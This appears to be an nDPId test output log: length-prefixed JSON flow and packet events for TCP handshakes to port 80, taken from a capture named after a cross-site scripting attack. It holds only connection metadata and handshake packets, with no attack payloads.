-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":2,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhlIJuXRqY+3mE6AScSDs4gAAAgQFtAQCCAoD5nhGATym0QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":3,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QMRAAD4GhRSsEAABwKgKMoZSAFBj7eYTCbl0a4AQAOWL6QAAAQEICgE8ptID5nhG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347952161,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347952161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8St5AAD4GevKsEAABwKgKMoZsAFCk\/OOLAAAAAKACchClLQAAAgQFtAQCCAoBPKlVAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":2,"flow_last_seen":1499347952161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhmwNHcNepPzjjKAScSBW4QAAAgQFtAQCCAoD5nrJATypVQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":3,"flow_last_seen":1499347952162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347952162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0St9AAD4GevmsEAABwKgKMoZsAFCk\/OOMDR3DX4AQAOX16AAAAQEICgE8qVUD5nrJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347953439,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347953439,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+l9AAD4Gy3CsEAABwKgKMoZ6AFBhTFDKAAAAAKACchB6UQAAAgQFtAQCCAoBPKqVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":2,"flow_last_seen":1499347953439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhnpvVsdUYUxQy6AScSDElQAAAgQFtAQCCAoD5nwJATyqlQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":3,"flow_last_seen":1499347953440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347953440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+mBAAD4Gy3esEAABwKgKMoZ6AFBhTFDLb1bHVYAQAOVjnQAAAQEICgE8qpUD5nwJ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347954738,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347954738,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a+xAAD4GWeSsEAABwKgKMoaIAFCY\/8A1AAAAAKACchDR4AAAAgQFtAQCCAoBPKvZAAAAAAEDAwc="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":2,"flow_last_seen":1499347954738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhoh\/\/ieLmP\/ANqAScSCqAQAAAgQFtAQCCAoD5n1OATyr2QEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":3,"flow_last_seen":1499347954739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347954739,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a+1AAD4GWeusEAABwKgKMoaIAFCY\/8A2f\/4njIAQAOVJCAAAAQEICgE8q9oD5n1O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347957282,"flow_last_seen":1499347957282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957282,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1499347957282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957282,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82nJAAD4G612sEAABwKgKMoaiAFCv93QkAAAAAKACchAEYwAAAgQFtAQCCAoBPK5WAAAAAAEDAwc="} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":2,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhqLwUjy4r\/d0JaAScSBUhgAAAgQFtAQCCAoD5n\/KATyuVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":3,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02nNAAD4G62SsEAABwKgKMoaiAFCv93Ql8FI8uYAQAOXzjQAAAQEICgE8rlYD5n\/K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347958588,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347958588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iDdAAD4GPZmsEAABwKgKMoawAFCTxierAAAAAKACchBruQAAAgQFtAQCCAoBPK+cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":2,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhrCsuJaMk8YnrKAScSCkXAAAAgQFtAQCCAoD5oEQATyvnAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":3,"flow_last_seen":1499347958589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347958589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iDhAAD4GPaCsEAABwKgKMoawAFCTxiesrLiWjYAQAOVDZAAAAQEICgE8r5wD5oEQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347961167,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347961167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lndAAD4GL1msEAABwKgKMobKAFDSZyRWAAAAAKACchAtzgAAAgQFtAQCCAoBPLIhAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":2,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhsp1SlCg0mckV6AScSDhRgAAAgQFtAQCCAoD5oOVATyyIQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":3,"flow_last_seen":1499347961168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347961168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lnhAAD4GL2CsEAABwKgKMobKAFDSZyRXdUpQoYAQAOWATgAAAQEICgE8siED5oOV"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347962480,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347962480,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OwpAAD4GisasEAABwKgKMobYAFAZTIhjAAAAAKACchCBhgAAAgQFtAQCCAoBPLNpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":2,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhtjOuip1GUyIZKAScSAAcgAAAgQFtAQCCAoD5oTdATyzaQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":3,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OwtAAD4Gis2sEAABwKgKMobYAFAZTIhkzroqdoAQAOWfeQAAAQEICgE8s2kD5oTd"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347963774,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347963774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82g5AAD4G68GsEAABwKgKMobmAFBdLG6iAAAAAKACchBWFgAAAgQFtAQCCAoBPLSsAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8263,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":2,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhub+xS4sXSxuo6AScSCf\/AAAAgQFtAQCCAoD5oYgATy0rAEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":3,"flow_last_seen":1499347963775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347963775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02g9AAD4G68isEAABwKgKMobmAFBdLG6j\/sUuLYAQAOU\/AwAAAQEICgE8tK0D5oYg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347965133,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347965133,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KcdAAD4GnAmsEAABwKgKMob0AFDtE5\/HAAAAAKACchCTpwAAAgQFtAQCCAoBPLYAAAAAAAEDAwc="} 
